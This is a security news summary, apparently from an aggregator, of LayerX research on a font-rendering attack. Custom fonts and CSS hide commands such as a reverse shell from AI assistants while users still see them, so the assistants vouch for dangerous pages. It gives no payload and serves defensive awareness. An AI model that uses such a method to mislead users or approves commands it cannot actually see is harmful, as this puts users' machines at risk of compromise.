AI & SecurityHIGH

AI Security - New Font-Rendering Attack Exposed

BCBleepingComputer·Reporting by Bill Toulas
📰 3 sources·Summary by CyberPings Editorial·AI-assisted·Reviewed by Rohit Rana
Updated:
🎯

Basically, attackers hide harmful commands in web pages so AI tools can't see them.

Quick Summary

A new font-rendering attack has been uncovered, allowing malicious commands to bypass AI assistants. This poses serious risks to users who trust these tools. Stay alert and verify commands before executing them.

What Happened

A new font-rendering attack has been discovered, allowing malicious commands to bypass AI assistants. Researchers at LayerX created a proof-of-concept demonstrating how attackers can use customized fonts and CSS to hide harmful instructions within seemingly harmless HTML. This technique relies heavily on social engineering, tricking users into executing commands that could compromise their systems.

The attack exploits the difference between how AI assistants analyze webpages and how browsers render them. While AI tools only see the structured text, users view a visual representation that can include malicious content. This disconnect can lead to dangerous recommendations from AI assistants, as they fail to recognize the hidden threats embedded in the webpage's design.

Who's Affected

As of December 2025, multiple popular AI assistants were vulnerable to this attack, including ChatGPT, Claude, and Copilot. Users of these platforms may unknowingly execute harmful commands, believing them to be safe due to the AI's reassuring responses. The potential for widespread exploitation raises concerns about the effectiveness of current safeguards in AI systems.

LayerX's findings indicate that this attack could significantly undermine user trust in AI technologies. If users cannot rely on AI assistants to accurately assess the safety of commands, they may hesitate to use these tools altogether, impacting the adoption of AI solutions across various sectors.

What Data Was Exposed

The primary risk associated with this attack is the exposure of sensitive commands that can lead to malicious actions, such as executing a reverse shell on the victim's machine. The hidden commands are encoded in a way that makes them unreadable to AI tools but visible to users. This means that while the AI assistant might only report benign content, the user could be executing harmful instructions without realizing it.

LayerX's report emphasizes that the attack does not require a significant breach of data but instead manipulates the existing trust users place in AI assistants. This manipulation can lead to a variety of security incidents, depending on the nature of the commands executed by the user.

What You Should Do

To protect yourself from this emerging threat, users should exercise caution when interacting with AI assistants and executing commands from web pages. It's crucial to verify the safety of instructions independently rather than relying solely on AI assessments. LayerX recommends that AI vendors enhance their systems by analyzing both the rendered page and the underlying HTML to better detect discrepancies that could indicate malicious intent.

Additionally, users should be aware that AI tools may not have safeguards against all forms of social engineering. As a best practice, always question the legitimacy of commands, especially those promising rewards or incentives. By staying informed and vigilant, users can mitigate the risks associated with such attacks.

🔒 Pro insight: This attack highlights the urgent need for AI systems to integrate visual content analysis to prevent exploitation through social engineering tactics.

Original article from

BCBleepingComputer· Bill Toulas
Read Full Article

Also covered by

SCSC Media

Novel font-rendering attack prevents AI assistants from detecting illicit code

Read Article
MAMalwarebytes Labs

Researchers found font-rendering trick to hide malicious commands

Read Article
CYCyber Security News

Simple Custom Font Rendering Can Poison ChatGPT, Claude, Gemini, and Other AI Systems

Read Article

Related Pings

MEDIUMAI & Security

Cybersecurity Veteran Mikko Hyppönen Now Hacking Drones

Mikko Hyppönen, a cybersecurity pioneer, is now tackling the threats posed by drones. His shift from fighting malware to drone defense highlights the evolving landscape of cybersecurity. With increasing drone use in conflicts, understanding these threats is crucial for safety.

TechCrunch Security·
HIGHAI & Security

Anthropic Ends Claude Subscriptions for Third-Party Tools

Anthropic has halted third-party access to Claude subscriptions, significantly affecting users of tools like OpenClaw. This shift raises costs and limits integration options, leading to dissatisfaction among developers. Users must now adapt to new billing structures or seek refunds.

Cyber Security News·
MEDIUMAI & Security

Intent-Based AI Security - Sumit Dhawan Explains Importance

Sumit Dhawan highlights the importance of intent-based AI security in modern cybersecurity. This approach enhances threat detection and response, helping organizations stay ahead of cyber threats. Understanding user intent could redefine security strategies in the future.

Proofpoint Threat Insight·
MEDIUMAI & Security

XR Headset Authentication - Skull Vibrations Explained

Emerging research shows that skull vibrations can be used for authenticating users on XR headsets. This could enhance security and user experience significantly. As XR technology evolves, expect more innovations in biometric authentication methods.

Dark Reading·
HIGHAI & Security

APERION Launches SmartFlow SDK for Secure AI Governance

APERION has launched the SmartFlow SDK, providing a secure on-premises solution for AI governance. This comes after the LiteLLM supply chain attack raised concerns among enterprises. As organizations reassess their AI infrastructures, SmartFlow offers a reliable alternative to cloud dependencies.

Help Net Security·
MEDIUMAI & Security

Microsoft's Open-Source Toolkit for Autonomous AI Governance

Microsoft has released the Agent Governance Toolkit, an open-source solution for managing autonomous AI agents. This toolkit enhances governance and compliance, ensuring responsible AI use. It's designed to integrate with popular frameworks, making it easier for developers to adopt.

Help Net Security·